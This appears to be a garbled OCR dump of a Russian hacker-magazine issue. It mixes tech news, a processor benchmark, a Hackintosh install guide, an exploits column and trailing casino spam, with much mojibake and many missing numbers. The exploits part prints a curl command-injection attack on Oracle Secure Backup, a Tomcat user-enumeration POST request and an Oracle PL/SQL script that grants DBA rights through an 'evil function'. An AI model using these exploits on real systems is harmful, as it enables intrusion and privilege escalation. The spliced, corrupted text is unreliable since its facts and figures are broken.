все мало — компания продолжает поставлять высить скорость загрузки сайтов и обеспечить дней. Информация о провайдере и местона-
нововведения с такой скоростью и в таких большую безопасность юзеров. Чтобы подклю- хождении пользователя так же не задержится в
объемах, что для адекватного их описания нам читься к нему, достаточно прописать первич- базах дольше недель. Верить Google или
потребовалась бы отдельная рубрика, никак ным и вторичным DNS адреса и В нет, решать тебе.
не меньше. Однако гугло-рубрики у нас нет, ответ на резонную волну параноидальных опа-
ÎÄÈÍ ÝÊÐÀÍ ÕÎÐÎØÎ, Кого сегодня удивишь ноутбуком? Верно — никого, ведь
 ÕÎÄÅ ÈÑÑËÅÄÎÂÀÍÈß
ÊÎÌÏÀÍÈÅÉ «ÊÎÌÊÎÍ»
ÁÛËÎ ÂÛßÂËÅÍÎ: ÓÐÎÂÅÍÜ
ÏÈÐÀÒÑÒÂÀ ÑÐÅÄÈ ÄÎÌÀØÍÈÕ
ÀÍÒÈÂÈÐÓÑΠÑÎÑÒÀÂËßÅÒ
70%.
ÊÈÁÎÐÃÈ ÈÄÓÒ
Как же был прав Уильям Гибсон, сказавший: правляющие прямо в мозг, через оптические
«будущее уже здесь, просто оно пока не очень нервы, сигнал со специальных очков, в которые
широко распространено». Ярким и живым до- встроена камера. Операция по имплантации
казательством этого изречения стал летний датчиков заняла 4 часа, затем еще 2 месяца
британец Питер Лэйн, потерявший зрение потребовалось на заживление глаза и вот — к
более 30 лет назад, а теперь вновь обретший Лэйну начало возвращаться зрение. Теперь он
его, благодаря бионическому глазу. Лэйн стал может не только различать очертания объектов
одним из первых в мире людей, кому в глаз вокруг себя, но даже читать текст со специаль-
имплантировали электронные датчики, стиму- ного экрана. Помимо Лэйна новую технологию
лирующие оставшиеся нервы сетчатки и пере- уже испытывают на себе еще 32 добровольца.
ÏÎÈÑÊÎÂÛÅ ÀËÜßÍÑÛ
Сразу ряд интересных сообщений поступил из стана крупных поисковых компаний.
Например, стало известно, что компании goalma.org и Google заключили соглашение о со-
трудничестве, согласно которому с января goalma.org начнет использование поисковых
технологий Google и разместит у себя рекламные блоки AdSense. О своих поисковых
технологиях goalma.org, впрочем, забывать тоже не собирается, планируя развивать их не
менее активно.
И, почти одновременно с первым сообщением, было объявлено о начале сотрудничества
между компанией «Яндекс» и goalma.org — поисковиком компании Microsoft. В частности,
для российской аудитории goalma.org разместил у себя рекламу с сервиса «goalma.org-
рект». Согласно официальным комментариям представителей «Яндекса», размещение
рекламы на goalma.org показало высокую эффективность и себя оправдало. Ограничатся
ли компании одной только рекламой, покажет время, а пока все происходящее очень
напоминает крылатую фразу «против кого дружить будем» :).
ÐÀÑÏÎÇÍÀÂÀÍÈÅ
ÎÁÐÀÇÎÂ
И еще немного о Google. Недавно широкой
публике была представлена очень интересная
программа для платформы Andriod — Google
Goggles. С помощью этой занимательной проги,
поиск в Сети стало возможно осуществлять не
через поисковые запросы, а просто используя
камеру своего телефона. Практически как в
фантастических книгах и фильмах — наводишь
мобильник на интересующий тебя предмет,
фотографируешь его, и сервис рассказывает
тебе, что это такое. На текущий момент Google
Goggles распознает самые разные книги, диски,
достопримечательности, магазины, рестораны,
кафе и даже разбирается в марках вин. В качест-
ве приятного бонуса прога умеет читать визитки.
Интересно, как скоро можно будет сфотогра-
фировать человека на мобильник и получить
информацию о нем? :)
Другой интересный факт относительно
платформы Android — на днях Сергей Брин
заявил, что в будущем компания планирует
слить Android и Chrome OS воедино, взяв
из каждой ОСи только лучшее и создав
своего рода идеал. Учитывая, что первые
девайсы с Chrome OS на борту появятся
только к концу года, это далеко иду-
щие планы.
ФБР США ÑÎÎÁÙÀÅÒ, ×ÒÎ ÌÎØÅÍÍÈÊÈ,
ÊËÅÏÀÞÙÈÅ È ÐÀÑÏÐÎÑÒÐÀÍßÞÙÈÅ ÔÅÉÊÎÂÛÅ
ÀÍÒÈÂÈÐÓÑÛ, ÓÆÅ ÇÀÐÀÁÎÒÀËÈ ÍÀ ÑÂÎÈÕ ÏÎÄÅËÊÀÕ
ÁÎËÅÅ $ ÌËÍ.
«ÇÅËÅÍÛÉ»
ÌÎÍÈÒÎÐ
Ассортимент компании Nec пополнился
новым монитором — дюймовая модель
MultiSync EAWMe станет первым на-
стольным монитором от Nec, использующим
светодиодную подсветку. Дисплей примеча-
телен низким энергопотреблением — за счет
использования светодиодов расход энергии,
по сравнению с мониторами с CCFL-под-
светкой, удалось сократить на 20%. Подчер-
кивается, что модель в высшей степени эко-
логична, то есть не содержит ртути, мышьяка
и галогена и полностью соответствует стан-
дартам ENERGY STAR , TCO и EPEAT
Gold. Остальные, более привычные глазу
характеристики таковы: соотношение сторон
, разрешение x , динамичес-
кая контрастность , максимальная
яркость — кд/кв.м. Монитор несет в себе
разъемы VGA, DVI, DisplayPort и USB, а также
комплектуется встроенными громкоговори-
телями. Его цена будет равняться примерно
$
ÏÎ ÄÀÍÍÛÌ
«ËÀÁÎÐÀÒÎÐÈÈ
ÊÀÑÏÅÐÑÊÎÃλ,
 ÍÎßÁÐÅ ÍÀ PAYPAL
È EBAY ÏÐÈØËÎÑÜ
% È %
ÂÑÅÕ ÔÈØÈÍÃÎÂÛÕ
ÀÒÀÊ.
BLU-RAY/DVD
ÍÀ ÏÎÄÕÎÄÅ
Не прошло и пары лет с момента победы
формата Blu-ray над форматом HD DVD,
и в продаже, наконец-то, вот-вот начнут
появляться двухсторонние Blu-ray/DVD
диски. Дело в том, что у проигравше-
го войну формата HD DVD такие диски
появились еще в году, а в случае с
Blu-ray их выпуск явно придерживали
сознательно. Первой двухсторонней
ласточкой станет трилогия о Джейсоне
Борне. Цена на диски будет своего рода
золотой серединой — $, дешевле
Blu-ray, но дороже DVD. Стоит сказать, что
паки Blu-ray+DVD пользуются огромной
и вполне застуженной популярностью, и,
в целом, работают на благо продвижения
технологии Blu-ray в массы.
AMD Phenom
II X4 BE
Intel Core
i7 Extreme AMD Athlon
MD Phenom Edition II X4
I X4 BE
ÃÎÍÊÈ AMD
Phenom
II X4 BE
D Phenom
X4 BE
ÍÀ «ÊÀÌÍßÕ»
ÑÐÀÂÍÈÒÅËÜÍÎÅ ÒÅÑÒÈÐÎÂÀÍÈÅ ÏÐÎÖÅÑÑÎÐΠÐÀÇËÈ×-
AMD Athlon
II X4 ÍÎÉ ÀÐÕÈÒÅÊÒÓÐÛ ÎÒ INTEL È AMD
МЕТОДИКА роко известный пакет Everest. Встроенный бенч- ких задачах мы использовали тест из пакета
ТЕСТИРОВАНИЯ марк в архиваторе WinRAR — также эффективное 3DMark’06 CPU Score. Разумеется, не обошли мы
Первая часть тестирования проходила на штат- средство для оценки производительности CPU и стороной и тестирование производительности в
ных значениях тактовой частоты и напряжения. памяти; прогоняли мы и его. С целью выявления играх: были запущены бенчмарки для игр Far Cry
После этого для процессоров, которые нам уда- пригодности процессора для реальных ресурсо- 2 (х, Ultra High, AF 8x, DirectX 10) и Crysis
лось разогнать до одинаковой тактовой частоты емких задач использовались тесты Cinebench R10 Warhead (х, Enthusiast, AF 8x, DirectX 10).
МГц (а не удалось это сделать только с AMD (для измерения производительности в рендерен-
Athlon II X4 ), мы провели тот же набор тестов ге трехмерной картинки) и TMPG Enc — для ко-
на данной частоте. Последний тест был интере- дирования видео. Последнее компрессировалось
сен тем, что должен был объективно показать в формат MPEG х, а в качестве источ- ÒÅÑÒÈÐÓÅÌÎÅ
производительность различных процессоров, ника было взято некомпрессированное видео с ÎÁÎÐÓÄÎÂÀÍÈÅ:
работающих на одной и той же частоте. видеокамеры формата FullHD x 3DMark
Собственно вычислительную мощность ис- Vantage — популярный пакет для тестирования AMD ATHLON II X4
пытуемых процессоров мы оценивали в тесте графической подсистемы. Поскольку видеокарта AMD PHENOM II X4 BE
NuclearMC, показывающем скорость процессора использовалась во всех тестах одна и та же, нам AMD PHENOM II X4 BE
в арифметических задачах. Эффективность рабо- стало интересно, окажет ли процессор сущест- INTEL CORE I5
ты с оперативной памятью проверялась в наборе венное влияние на результат. А для тестирования INTEL CORE I7
тестов Memory Benchmark, который входит в ши- возможностей самого процессора в графичес- INTEL CORE I7 EXTREME EDITION
СТРАННЫЙ РЕЗУЛЬТАТ (ВПЕРЕД ВЫРЫВАЕТСЯ МЛАДШАЯ ПРОЦЕССОР МАЛО ПОВЛИЯЛ НА РЕЗУЛЬТАТЫ ТЕСТА: «ПОГОДУ»
МОДЕЛЬ INTEL CORE I5 В РАЗОГНАННОМ СОСТОЯНИИ) ОБЪ- ДЕЛАЕТ ВИДЕОКАРТА. ТЕМ НЕ МЕНЕЕ, МЛАДШИЕ МОДЕЛИ ОТ
ЯСНЯЕТСЯ ТЕМ, ЧТО ЗДЕСЬ ЗА СЧЕТ МЕНЬШЕГО МНОЖИТЕЛЯ INTEL И AMD (AMD ATHLON II X4 И INTEL CORE I5 ) ЧУТЬ-ЧУТЬ
ПРИШЛОСЬ ВЫСТАВИТЬ БОЛЬШУЮ ЧАСТОТУ ШИНЫ — ВОТ И ВСЕ. ОТСТАЛИ ОТ ОСТАЛЬНЫХ
В ЦЕЛОМ ЖЕ, ПРОЦЕССОРЫ INTEL ИДУТ ВПЕРЕДИ С СУЩЕСТВЕН-
НЫМ ОТРЫВОМ
ðóá.
AMD PHENOM INTEL CORE ðóá.
II X4 BE i5
ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:
РАЗЪЕМ: SOCKET AM2+/AM3 ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:
АРХИТЕКТУРА: K10 РАЗЪЕМ: SOCKET
ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ: 45 АРХИТЕКТУРА: LYNNFIELD
ЧАСТОТА, ГГЦ: ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ: 45
ШИНА, МГЦ: ЧАСТОТА, ГГЦ:
КЭШ-ПАМЯТЬ L3, МБАЙТ: 6 ШИНА, ГБИТ/C:
ТИПИЧНЫЙ УРОВЕНЬ ТЕПЛОВЫДЕЛЕНИЯ (TDP), ВТ: КЭШ-ПАМЯТЬ L3, МБАЙТ: 8
КОЛИЧЕСТВО ЯДЕР: 4 ТИПИЧНЫЙ УРОВЕНЬ ТЕПЛОВЫДЕЛЕНИЯ (TDP), ВТ: 95
МНОЖИТЕЛЬ: СВОБОДНЫЙ КОЛИЧЕСТВО ЯДЕР: 4
МНОЖИТЕЛЬ: 21 (МАКСИМУМ — 24)
И ЗДЕСЬ РЕЗУЛЬТАТЫ ОКАЗАЛИСЬ ДОВОЛЬНО ПРЕДСКАЗУЕМЫ- ВЫЧИСЛЕНИЯ УЧАСТНИКАМ ТЕСТИРОВАНИЯ ОТ INTEL ДАЮТСЯ
МИ: ВПЕРЕД ВЫРЫВАЮТСЯ ТОПОВЫЕ МОДЕЛИ ОТ INTEL, А AMD ЯВНО ЛУЧШЕ. В РАЗОГНАННОМ СОСТОЯНИИ AMD PHENOM II X4
СУЩЕСТВЕННО ОТСТАЕТ BE И AMD PHENOM II X4 BE ВЫДАЮТ ПРАКТИЧЕСКИ ИДЕНТИЧ-
НЫЕ РЕЗУЛЬТАТЫ. ТО ЖЕ КАСАЕТСЯ И ПАРЫ INTEL CORE I7 И
INTEL CORE I7 EXTREME EDITION
ðóá.
Процессор, основанный на архитектуре Nehalem, в абсолютном боль- Флагман от Intel вышел абсолютным победителем практически из всех
шинстве тестов показал прекрасную производительность, существенно тестов, продемонстрировав рекордную производительность. Ему мы и
обогнав и участников от AMD, и своего младшего собрата. А стоит денег присуждаем награду «Выбор редакции».
хоть и не очень маленьких, но вполне разумных. В разогнанном же
состоянии он практически не уступил старшему (и почти вчетверо более
дорогому!) собрату — Intel Core i7 Extreme Edition. Безусловно, покупать лишь процессор по цене компьютера (не самого,
кстати, медленного) могут позволить себе только очень состоятельные
пользователи, которых интересует не соотношение «цена/качество»,
Модель не назовешь подходящей для экстремальных «гонщиков»: а все только самое-самое. Тем более, разница в производительности с
максимальный множитель 21 накладывает ограничения на разгонный младшим Intel Core i7 оказалась не такой уж существенной.
потенциал.
Intel среднего ценового диапазона обгоняют Награду «Лучшая покупка» получает процес-
ÂÛÂÎÄÛ самые старшие модели от AMD. Так что выбор сор AMD Phenom II X4 BE, показавший
Они, в общем-то, очевидны. При наличии для действительно мощной системы, когда хорошую производительность при мини-
совсем небольшого количества денег сегод- финансовые затраты не столь важны — одно- мальных затратах, а «Выбор редакции» при-
ня на базе AMD можно собрать более шуструю значно Intel, а нам лишь остается ждать, пока суждается флагману линейки процессоров
конфигурацию, чем на Intel. Но уже модели от AMD выпустит более быстрые процессоры. Intel — Core i7 Extreme Edition.z
Ê
омпьютеры Apple Macintosh всегда ÂÛÁÎÐ ÊÎÍÔÈÃÓÐÀÖÈÈ ринской платы с используемым южным
были элитными и в нашей стране На какое железо реально поставить МакОС? мостом — тоже непростая задача. По произ-
скорее представляют собой экзотику. Не на любое! водителям можно утверждать, что популяр-
Люди либо ничего про них не знают, 1. ПРОЦЕССОР. ные ASUS и Gigabyte для этих целей вполне
либо восхищаются их красотой и Оптимальным выбором будет Intel Core 2 пригодны. Нужно понимать, что другие чип-
удобством. Даже среди тех, кто все-таки знает, Duo, но от Интел подойдут и Core Duo, Core сеты nForce, VIA, SIS, AMD/ATI использовать
что это, многие не могут себе позволить такой Solo (Yonah), Core 2 Quad, Xeon, Pentium M скорее нельзя, чем можно, хотя есть и такие
компьютер, в первую очередь из-за стоимости. (новой серии), Core i5, i7, Atom. Важно, чтобы работающие хакинтоши.
Еще больший аргумент против — якобы боль- они поддерживали набор инструкций SSE3; 3. ПАМЯТЬ.
шие проблемы с программным обеспечением впрочем, с процессорами SSE2 (Pentium M Ничего особого. Если у тебя работает WindowsXP,
в России. (старый), Pentium 4) тоже реально, но с опре- то MacOSX тем более будет работать.
Впрочем, некоторые компании стали про- деленными проблемами. Аналогично можно 4. ЖЕСТКИЙ ДИСК.
давать так называемые клоны системы, попытаться поставить систему на AMD, но — Опять же, ничего необычного.
собранные на самом обычном железе, но при используя специальное ядро, созданное для Предпочтительнее с интерфейсом SATA, хотя
этом — с предустановленной MacOSX. Такая этих целей. Насчет Атома возникли новые и старый IDE-интерфейс вполне пригоден.
система практически неотличима от ориги- сложности, впрочем, уже преодолеваемые Размер — современный: 10 Гб достаточно
нальной, на ней можно запускать любые про- хакинтош-сообществом. для установки системы, которая еще займет
граммы и даже обновлять ее в онлайне. Мы 2. СИСТЕМНАЯ ПЛАТА. место для виртуальной памяти, для файла
решили разобраться, как им такое удалось и На оригинальных Маках используются чип- гибернации и собственных кешей, но всегда
как собирается хакинтош. А заодно — какие сеты Intel и nForce. Есть сведения о простой хочется чего-то большего, и программ поста-
отличия имеются с оригинальной фирменной установке на чипсеты Intel , x, P, вить, и музыки, и фильмов Модель значе-
системой. EP31, EP45 и другие. Более важно понятие ния не имеет.
Итак, устанавливаем на домашний PC, южного моста: ICH7,8,10 поддерживаются 5. ВИДЕОКАРТА.
наряду с Windows, еще и MacOS (ХакОС) оригинальными драйверами, ICH9 требует Принципиально, что драйвера для видеокарт
в пробных целях. В любой момент можно некоторых патчей, MCP79 тоже относится существуют только для современных Nvidia,
вернуться в привычную среду (и как там к родным мостам. Перечислить, какие есть ATI и Intel. И то не все модели. VIA Chrome,
становится тоскливо после такого праздни- платы на рынке с такими же чипсетами, SIS, Matrox и большинство устаревших карт
ка жизни!). нереально, да и сопоставить модель мате- шансов не имеют. Более старые модели воз-
можно использовать с MacOSX Tiger, а для и Broadcom. Ниже по тексту будет пример жесткий диск SATA Гб, DVD-RW Optiarc. В
современной Snow Leopard перечень прибли- оживления адаптера Broadcom целом — современный середнячок эконом-
зительно таков: 9. USB-УСТРОЙСТВА. класса.
• Nvidia Geforce 7xx00, GT — GT (x Видеокамера, блютус, ТВ-тюнер, флеш-
не меньше 3) накопитель, WiFi, принтер, сканер, клавиатура ÂÛÁÎÐ ÎÏÅÐÀÖÈÎÍÍÎÉ ÑÈÑÒÅÌÛ
• ATI Radeon X, X, X, HD, и мышь работают практически все. На Интел-совместимых компьютерах можно
HD, HD, HD, HD, HD DVD-RW ПРИВОД. запустить MacOSX x Tiger, MacOSX x
• Intel GMA, X — версии для мобиль- Тоже работают практически все, как с интер- Leopard и новейшую MacOSX x Snow
ных компьютеров. фейсом SATA, так и с ATA. Но последний вызо- Leopard. Разумеется, предпочесть стоит
• Мобильные версии nVidia и ATI — очень вет некоторые проблемы при инсталляции. последнюю, но при этом:
большие проблемы. Подводя черту под этим обзором, следует 1. Видеокарты Radeon — возможно
6. ЗВУКОВАЯ КАРТА. сказать, что всегда есть риск, что какое-то полноценно запустить только в Тигре.
Для устаревшего стандарта AC97 есть драй- устройство в системе окажется неподдер- 2. Видеокарты nVidia Geforce 5x00 — 6x00 еще
вер, подходящий для большинства карт живаемым. Ты можешь поискать решение возможно запустить в Леопарде.
производства Realtek и Analog Devices. Для в интернете, либо смириться, мол, пробуя 3. Снежный Барс пока не является хорошо
нового стандарта HDA (High Definition Audio) МакОС, и не рассчитывал, что оно понадо- отлаженной стабильной системой.
есть варианты практически для всех встроен- бится. Внешние различия между системами не столь
ных карт. А вот с PCI-картами нужно выяснять Видеокарта, даже если она не поддержива- и велики, да и совместимость с программным
индивидуально. ется, все равно будет показывать изображе- обеспечением не является решающим аргу-
7. СЕТЕВОЙ АДАПТЕР. ние в одном из стандартных режимов VESA, ментом: все работает в Леопарде, и многое
Практически любые на чипах Realtek или например, х, но отсутствие поддержки — в Тигре. С другой стороны, очень совре-
Marvell, несколько сложнее — с Intel и 3Com, OpenGL ограничит тебя в списке программ, менным компьютерам может подойти только
также есть драйвера на некоторые карты которые можно использовать. К примеру, не очень современная система, опять таки из-за
Broadcom (x, ). Приходится оговари- будут запускаться системные шахматы и DVD- драйверов.
ваться, ибо есть проблемы с модификациями, player. Вместе с развитием операционной системы
например, Marvell или Intel А уси- Итак, в пробной конфигурации мы выбрали трудилось и хак-сообщество, обеспечивая
лиями хак-сообщества созданы драйвера под десктоп на основе системной платы Gigabyte совместимость ОС со стандартными компью-
некоторые модификации nForceLAN. EPUD3LR с процессором Intel Core 2Duo терами. Так, для установки Тигра требовалось
8. WIFI-АДАПТЕР. E, память 2х1 Гб, звуковая карта встро- подменять ядро системы и ряд жизненно важ-
Вопрос актуален для владельцев ноутбу- енная Realtek ALC, сетевой адаптер ных программ на модифицированные версии.
ков. Работают адаптеры на чипах Atheros Realtek , видеокарта Palit Geforce GT, В Леопарде появилось понятие ванильного
ÏÐÎÖÅÑÑ ÈÍÑÒÀËËßÖÈÈ
Может быть, на твоем компьютере уже стоит
система Windows, и ты не хочешь ее уничто-
жать, а может быть, ты планируешь ее только
поставить. В этом случае начинать следует
с нее. Во-первых, МакОС требует, чтобы
SATA-винчестер работал в режиме AHCI. Для
южного моста ICH7 этого не требуется, а вот
для других — более чем желательно. И если
для Windows Vista в этом нет проблемы, то
для Windows XP не все так гладко. Сам дис-
трибутив Windows XP SP2 не содержит драй-
вера AHCI и не пожелает устанавливаться
на HDD в таком режиме, а после установки
системы драйвер RAID/AHCI не хочет прини-
маться системой, потому что такое устройство
не включено в БИОСе. Попытка же вклю-
чения в БИОСе режима приводит к синему
ЗАГРУЗЧИК CHAMELEON-2 экрану при загрузке XP. Тупик?! Для южного
моста ICH8 существует корректный инстал-
лятор драйвера, — ищи на прилагаемом
ядра, т.е. оригинальное ядро от самой Эппл. Вариант: переделать сам установочный диск, диске, его также можно модифицировать для
Система стала родной, немодифицированной, чтобы он содержал в себе обход этой защиты, инсталляции на ICH9 путем редактирования
только с небольшими добавками. В Снежном да еще и набор дополнительных драйверов, inf-файла, заменой на Для других
Барсе количество необходимых добавок чтобы систему можно было поставить на вариантов придется искать другие пути.
убавилось, ниже мы расскажем, почему. более широкий круг компьютеров. Такой диск Что ж, с этой проблемой ты справился, и
Впрочем, эти трюки применимы и к Леопарду, называется сборкой, и есть люди, которые Windows у тебя работает с винчестером
просто они разработаны уже с выходом их производят, возможно, и в коммерческих в режиме AHCI. Преимущество скорости
системы По каждой из этих версий тре- целях, а чаще за просьбу о пожертвовании. В очевидно. Менее очевидно, но для нас
буется отдельный рассказ, но речь пойдет чем минусы? Поскольку сборку делали не мы важнее — совместимость с МакОС. Теперь
только про последнюю, самую современную сами, то не знаем, что конкретно там изме- следует выделить раздел для установки
версию операционной системы с названием нено, и остается только верить, что исправ- OSX. Раздел должен быть первичным, а не
Snow Leopard (он же Барсик). ления нужные и безопасные. Возможны логическим диском в расширенном разделе!
изменения внешнего вида и логотипов — Простейший способ: щелкнуть правой кла-
ÂÛÁÎÐ ÄÈÑÒÐÈÁÓÒÈÂÀ дескать, система неоригинальная и будьте вишей мыши по значку «Мой компьютер»,
Оригинальные компьютеры Apple Macintosh добры видеть логотип создателя сборки. Не выбрать «Управление» Æ «Накопители» и
комплектуются дисками с операционной очень корректно, все же, сама система созда- произвести стандартные действия по созда-
системой, однако эти диски являются на компанией Apple и ее стоит уважать. Для нию нового первичного раздела в формате
модельно-зависимыми, и, стало быть, непри- подобных случаев существует пакет Restore_ FAT Если это невозможно, то можно вос-
годны для наших целей. Пригодным будет Desktop_Settings, который нетрудно найти в пользоваться одной из программ управления
диск с пометкой Retail, который является интернете и с ним вернуть оригинальный вид разделами: Partition Magic, Paragon Partition
общим для всех моделей. Просто поставить с оболочки. Еще один минус — версия систе- Manager, Acronis. Существует и бесплатный,
него систему на хакинтош не удастся, потому мы. Сборки чаще всего имеют устаревшую хорошо работающий способ: загрузиться с
что он также рассчитан на оригинальный версию. Впрочем, если постараться (о чем Ubuntu LiveCD, но не запускать инсталляцию
компьютер. В отличие от Microsoft Windows, рассказано ниже), можно подправить систему Линукса, а набрать в терминале команду
Apple MacOSX не требует ввода серийного таким образом, что ее реально будет апдей- sudo gparted, пароль вводить не нужно.
номера и активации, подразумевается, что тить официальными пакетами от Apple. Плюс Программа gparted поможет совершенно
подлинность компьютера заложена в нем же сборки очевиден: установить систему корректно, без потерь данных, изменить раз-
самом. В компьютерах Apple модель и серий- получится за минут, даже не имея ника- меры разделов и их расположение, создать
ный номер, а также свойства установленных кого опыта в хакинтошестроении. Установка новый раздел и отформатировать его. Итак,
устройств (аудио, видео и других) заложены Ритейла потребует немалых усилий и знаний. хороший вариант разбивки на разделы:
в EFI (goalma.org Вкратце путь таков: скачать из Сети образ 1. WindowsHD, первичный, активный раздел,
Firmware_Interface), в отличие от БИОСа загрузочного диска или флеш-накопителя, NTFS.
большинства наших компьютеров. Некоторые содержащего минимальную ОС с минималь- 2. SnowHD, первичный, пока FAT
файлы в системе зашифрованы, и ключ шиф- ным набором драйверов, загрузиться с него в 3. Расширенный раздел, где можно органи-
рования заложен в специальной микросхеме. режим командной строки, вставить в привод зовать логические разделы, если необходи-
Отсюда легко сделать вывод: для установки DVD инсталляционный диск Ритейл, смонти- мо.
системы MacOSX на неоригинальный ком- ровать его и запустить с него инсталляцию. Теперь вставляем нашу загрузочную систему
пьютер, эту защиту следует обходить еще на Широкое хождение имеет сборка 10А от либо сразу сборку и грузимся с нее. На экра-
старте установки системы, т.е. старт должен dan, которая представляет собой тот же не появляется сообщение про Darwin boot и
быть с другого источника. дистрибутив Ритейл, но с нужным загрузчи- приглашение нажать <F8>. Это стоит сделать
система все же загружается, чаще всего Store (0x08, OSVR) acpi_tbls=`ioreg -lw0 cut -d\; -f 1
Теперь остается только перейти к делу! Настоящий эксплоит по неавторизированному выполнению команд пишется в три строки: # ïîäãîòîâêà êîìàíäû äëÿ èñïîëíåíèÿ shell="1%26ver>osbshelltmp" # îðãàíèçàöèÿ çàïðîñà ê óÿçâèìîìó ñöåíàðèþ ñ óêàçàíèåì êîìàíäû äëÿ èñïîëíåíèÿ ($shell) è íàëè÷èåì âàëèäíîé ñåññèè ($session) curl -k -s "https://$TARGET/property_goalma.org?type=Chec kProperties&vollist=$shell" -b "PHPSESSID=$session" > / dev/null # ïðîñìîòð âûïîëíåíèÿ ðåçóëüòàòà check=`curl -ks "https://$TARGET/osbshelltmp" -b "PHPSESSID=$session" grep -i Microsoft`
Финальной строкой мы просто убеждаемся, что вывод команды показал название версии СУБД и платформы. Полный сценарий для эксплуатации можно скачать здесь: goalma.org exploits/_sh.
SOLUTION Вендор такого уровня своевременно отреагировал на появившееся сообщение в лентах bugtrack и выпустил исправление. TARGETS Oracle Secure Backup Server X.
02
ПОДБОР СУЩЕСТВУЮЩИХ ПОЛЬЗОВАТЕЛЕЙ APACHE TOMCAT
BRIEF Известно, что на системе, где установлен Apache, находится (или может находиться) много пользователей. Конечно, сам Apache часто запускают с правами «nobody», но песня о другом! Используя ошибку класXÀÊÅÐ 01 // 10
КАК ВИДИШЬ, РОЛЬ ORACLE SECURE BACKUP ДОСТАТОЧНО ВЕЛИКА И ПОЗВОЛЯЕТ РЕЗЕРВИРОВАТЬ ДАННЫЕ НА НАИБОЛЕЕ КРИТИЧНЫХ ОБЪЕКТАХ
НАГЛЯДНЫЙ ПРИМЕР — ПОЛЬЗОВАТЕЛЬСКИЕ ПУТИ КАК НА ЛАДОНИ!
са «Design Error», а именно ошибку в реализации и проектировании со стороны разработчиков, существует возможность перечислить текущих пользователей системы! В принципе, такая возможность существовала и ранее во многих версиях известного WEB-сервера:
EXPLOIT Код эксплоита выполнен в двух вариациях — классический обход авторизации и SQL-injection, а во второй применяется метод Cursor Injection. Классический обход ограничений:
/~root /~andrej /~gogy /~UFO
Между прочим, одним из первых сканеров безопасности, который проводил проверки на предмет перебора пользователей по Apache, был Nessus (существует реализованный плагин на NASL), а затем и отечественный XSpider.
EXPLOIT Сейчас это можно делать, формируя специальный POST-запрос: POST /j_security_check HTTP/ Host: goalma.org j_username=tomcat&amp;j_password=%
Комбинируя связки логин и пароль, можно добиться раскрытия данных учетных записей локальных пользователей, а по возврату ошибки, наоборот, убедиться, что их нет в системе.
set serveroutput on; prompt [+] ctxsys-drvxtabc-create_goalma.org exploit prompt [+] by Andrea "bunker" Purificato — http:// goalma.org prompt [+] 37F1 A7A1 BB94 89DB A 9F74 AF4C BFA2 prompt undefine the_user; accept the_user char prompt 'Target username (default TEST): ' default 'TEST'; prompt prompt [-] Building evil function CREATE OR REPLACE FUNCTION OWN RETURN NUMBER AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO &the_user'; COMMIT; RETURN(0); END; / prompt [-] Finishing exec goalma.org_tables(''
nest...казино с бесплатным фрибетом Игровой автомат Won Won Rich играть бесплатно ᐈ Игровой Автомат Big Panda Играть Онлайн Бесплатно Amatic™ играть онлайн бесплатно 3 лет Игровой автомат Yamato играть бесплатно рекламе казино vulkan игровые автоматы бесплатно игры онлайн казино на деньги Treasure Island игровой автомат Quickspin казино калигула гта са фото вабанк казино отзывы казино фрэнк синатра slottica казино бездепозитный бонус отзывы мопс казино большое казино монтекарло вкладка с реклама казино вулкан в хроме биткоин казино 999 вулкан россия казино гаминатор игровые автоматы бесплатно лицензионное казино как проверить подлинность CandyLicious игровой автомат Gameplay Interactive Безкоштовний ігровий автомат Just Jewels Deluxe как использовать на 888 poker ставку на казино почему закрывают онлайн казино Игровой автомат Prohibition играть бесплатно